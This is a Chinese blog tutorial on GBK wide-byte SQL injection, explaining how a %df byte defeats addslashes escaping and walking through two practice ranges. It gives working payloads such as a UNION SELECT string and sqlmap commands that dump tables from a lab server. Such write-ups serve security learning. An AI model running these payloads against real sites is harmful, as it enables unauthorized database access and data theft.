宽字节注入

最新推荐文章于 2024-04-28 16:11:59 发布
最新推荐文章于 2024-04-28 16:11:59 发布
阅读量640 收藏 1
点赞数
分类专栏: SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/newlife1441/article/details/126231981
版权

📔前言

    在学习宽字节注入前我们需要先了解一下mysql中常常用来转义的函数有以下几种:addslashes、mysql_real_escape_string、mysql_escape_string以及后面在高版本被去除的magic_quote_gpc,常用的是addslashes,它的定义是返回在预定义字符之前添加反斜杠的字符串,预定义字符是:单引号(')、双引号(")、反斜杠(\)、NULL

PHP addslashes() 函数https://www.w3school.com.cn/php/func_string_addslashes.asp

📔原理

  • 根据MySQL中的GBK编码的特性来实现绕过转义限制
  • GBK:一个汉字=2个字节
  • 当我们输入单引号时,mysql会调用转义函数,将单引号变为',其中的十六进制是%5c,mysqlGBK编码,会认为%df%5c是一个宽字节,也就是'運',从而使单引号闭合(逃逸),进行注入攻击,也可以使用url解码后的%df(�)来进行绕过

GBK 编码范围, GBK 编码表GBK编码采用双字节编码方案,其编码范围:8140-FEFE,剔除xx7F码位,共23940个码位。共收录汉字和图形符号21886个,其中汉字(包括部首和构件)21003个,图形符号883个。https://www.qqxiuzi.cn/zh/hanzi-gbk-bianma.phpGBK 编码表 - 在线工具GBK编码表http://106.14.124.170/Encoding/GBK

📔方法

在限制的符号前面加一个ascii码大于128的和反斜线才会被编码成一个汉字
id=1%df'
id=1�'

📔实验

📓靶场一

chinalover.sinaapp.com/SQL-GBK/index.php?http://chinalover.sinaapp.com/SQL-GBK/index.php?

#直接测试
id=1'

#添加%df
id=1�'

📓靶场二

SQL注入之宽字节(GBK)注入https://labs.do-ta.com/index/course/detail/id/110

id=1%df'

#此时我们可以看出有报错提示说明我们单引号逃逸成功了,那么直接联合查询出数据
id=-1%df' union select 1,database(),3%23

  • 啥话不说上针管(sqlmap)
#注入获取库中的表
python sqlmap.py -u "http://120.25.24.45:30206/index.php?id=1%df'" --tables -D "sql-kuanzijiegbk-1" -v 0

#注入获取我们的key表数据
python sqlmap.py -u "http://120.25.24.45:30206/index.php?id=1%df'" -T "key" -D "sql-kuanzijiegbk-1" -v 0 --dump

 

会伏地的向日葵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
宽字节注入详解-附件资源
03-05
宽字节注入详解-附件资源
渗透测试-SQL注入之宽字节注入
lza20001103的博客
04-20 7376
渗透测试-SQL注入之宽字节注入
13 宽字节注入1
08-03
13 宽字节注入1
注入漏洞一把嗦(原理+步骤+防御)
Y22Lee的博客
03-21 1115
以csdn为例,除去请求头信息,剩下的都是Head信息,其中U-A是用户的基本信息,Referer是用户的请求来源。没有回显的注入,SQL注入中最繁琐;因为没有明确的回显,所以不能直观的得到数据。只能尝试测出数据。一般盲注分为布尔盲注和时间盲注。宽字节是指占俩个以上字节的字符,而一般的字符只占一个字节,被称作单字节(窄字节)。ASCII:单字节编码GBK,UTF-8:单字节/双字节编码(区别根据范围划分,范围与ASCII保持一致)英文通常是默认占用一个字节,而汉字占用俩个字节!
SQL注入-宽字节注入(十一)(面试热点)
Gjqhs的博客
02-20 847
实验目的 普及宽字节注入的原理和应用场合,以及宽字节注入的基本方法和流程。 实验环境 攻击机:告诉桃花不用开了 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码asdfghjkl 靶机:关键球 (1)操作系统:Centos7(本机亦可) (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、Webug
宽字节SQL注入
一米八多的瑞兹的博客
02-25 140
宽字节SQL注入 1. 宽字节注入基础 最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图1所示,然后在十六进制前面加%即可,即为%81 GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F) 2. 宽字节注入代码分析 Sqli-Less32 代码分析 mysql_real_escape_string() 和 ad
SQL注入之宽字节注入
m0_38103658的博客
10-24 662
SQL注入之宽字节注入 0x01简介 SQL注入近几年来连续被OWASP当作十大漏洞中最最危险的漏洞而存在。无论是从数据库中获得敏感信息还是执行一系列的恶意操作甚至是直接获取整个数据库权限,都可能发生在一次小小的提交参数的过程中。为此大多数网站开始对于SQL注入做了一定的防御方法,最早有人提出,将用户提交的所有敏感字符进行过滤和转义,要么将提交参数中的敏感字符过滤掉后再提交给数据库,要么对那些敏...
宽字节手注+sqlmap
lc0813的博客
07-31 314
ctf:有趣的注入 (一)手注: url:http://ctf.cdusec.org:8086/sqli.php?id=1 实验工具:火狐hackbar x001: 输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入,显示报错。) 截图: 在这里插入图片描述 在这里插入图片描述 x002判断列数:判断出来有3列。 http://ctf.cdusec.org:8086/sqli...
sqlmapsqllibs_05-宽字节注入-32-37
Xor0ne
07-29 305
本篇文章中的一些过滤讲解大部分来自于我的另外一篇博客,如果不太清楚,可以移步: Sqllibs-less32-37-宽字节 32、Bypass addslashes() 可以知道在这里过滤了斜杠、单引号、双引号,即会在符号前加上斜杠进行过滤。而由下图可以知道闭合方式为单引号,因此我们需要对这个进行绕过。 在此我们利用在单引号前加上%df,而由于转义会在单引号前面加上一个单引号,在犹豫设置了gbk编码,因此%df与斜杠(%5c)会被当做一个中文字符,这样的话,就类似于斜杠被吃掉了。 手工注入语句如下所示:
mysql宽字节注入_(宽字节注入) 手注+sqlmap
weixin_29726381的博客
02-27 223
进入题目后先简单尝试一下。 很明显的宽字节注入宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码.手工注入1、判断列数:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23http://chinalover.sinaapp.com/SQL-GBK/index.php...
网络安全 宽字节注入 CMS网站渗透实战 学术交流
12-05
web安全初学者,跟着公开课学习了一段时间,第一次在靶场环境下,边查询边过关,请教了不少人,对blueCMS系统存在的宽字节注入漏洞成功进入后台,找到后台文件编写路径,写入一句话木马,通过蚁剑连接成功后,开始提...
第十九节 宽字节SQL注入-01
09-15
第十九节 宽字节SQL注入-01
SQL 宽字节注入详解
永远是少年
08-26 898
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper介绍。 一、字节编码与宽字节简介 二、宽字节注入原理 三、宽字节注入实战
深入浅出带你学习宽字节注入
bluemoon_0的博客
02-13 684
深入浅出带你学习宽字节注入
SQL注入之宽字节注入演示(详细介绍宽字节)
Firebasky的博客
05-02 3121
宽字节介绍原理即绕过演示 自己对宽字节的认识和理解,如果有错误望指出,共同学习。 宽字节的介绍 GBK 是占两个字节(也就是名叫宽字节,只要字节大于1的都是) ASCII 占一个字节 PHP中编码为GBK ,函数执行添加的是ASCII编码,mysql默认字符集是GBK等宽字节字符集 为什么要介绍宽字节? 宽字节的出现个人感觉是因为SQL语句过滤了一些字符,比如 ’ 转义成 /’ 或者 ...
sqlmap宽字节注入(一)GET
qq_45300786的博客
07-17 1400
不懂的可以看前面的宽字节注入(一) 先给他写好闭合 %df' -- + 然后抓包 把这个数据包,保存到一个为 321.txt的文件 开始用sqlmap跑类型 跑数据库 下面还可以跑很多参数,我就不一一介绍了。 ...
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
最新发布
keyboard专栏
04-28 336
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
sql注入宽字节注入
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值